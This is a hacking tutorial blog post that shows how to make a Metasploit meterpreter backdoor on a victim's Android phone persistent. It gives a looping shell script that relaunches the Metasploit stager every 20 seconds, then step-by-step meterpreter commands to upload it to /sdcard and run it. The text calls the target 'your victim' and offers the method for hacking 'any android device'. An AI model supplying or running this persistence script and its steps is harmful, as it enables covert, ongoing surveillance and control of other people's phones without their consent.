Persistent Backdoor in Android using Kali Linux with a Shell script

Hello guys, today we’re going to show you that how you can create a persistent backdoor in android using Kali Linux after hacking with msfvenom.

Previously we discussed two methods through which you can hack any android device:

  1. Hack Android using Msfvenom in LAN/WAN
  2. Hack Android using Metasploit without Port-Forwarding over WAN using Ngrok

You can use any of the method above to hack the android device but once you get the meterpreter session, that session is not persistent, to make it persistent, you need to upload one shell script into any location of /sdcard directory.

Generally, your victim’s device is not rooted, so you can’t create any file in /etc/init.d directory due to less permissions, so we are using another method to upload a backdoor in /sdcard directory using shell command and then will execute the script which automatically makes a persistent backdoor in that android device.

Here are the steps which you need to follow:

First required part is to get the meterpreter session by using any of the method, there are alot of methods to build a backdoor .apk file like using TheFatRat, msfvenom and spade etc. You can use any of the method and get the meterpreter session.

As soon as you get the meterpreter session, you need to create a (.sh) file and paste the following code into it:

#!/bin/bash
while true
do am start –user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

And save it as anyname.sh

here’s the updated version of above shell script which is 100% compatible with all android versions:

#!/bin/bash
while :
do am start –user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20
done

After that you need to get into root directory of android device by typing “cd /” in terminal.

Now you need to get into /sdcard location by typing “cd /sdcard” in same terminal.

Here you can upload your backdoored script by typing “upload yeahhub-backdoor.sh” in same terminal.

Now all we have to do is execute the script once, and then everything will be done automatically, type “shell” to enter into system’s shell mode of android device.

Here you need to again go into same location i.e. cd /root/sdcard and execute the backdoor using “sh yeahhub-backdoor.sh“.

In above screenshot, as you can see, your script has been executed successfully, you can terminate the execution by pressing CTRL + C and then type Y.

You can test it by exiting from meterpreter and again setting up a Listener. You should get a meterpreter prompt automatically as shown in above screen.

The persistent of the backdoor will only remain until a reboot of the android system. If your victim is in same network i.e. LAN, then the persistence will remain forever on LAN and if you have static IP, then also your persistence will remain forever on WAN too.

 

You may also like:

Sarcastic Writer

Step by step hacking tutorials about wireless cracking, kali linux, metasploit, ethical hacking, seo tips and tricks, malware analysis and scanning.

Related Posts

This Post Has 3 Comments

  1. Is the –user 0 a zero, or the letter O (the capital O).

    It looks like a zero to me, but it’s hard to tell

Comments are closed.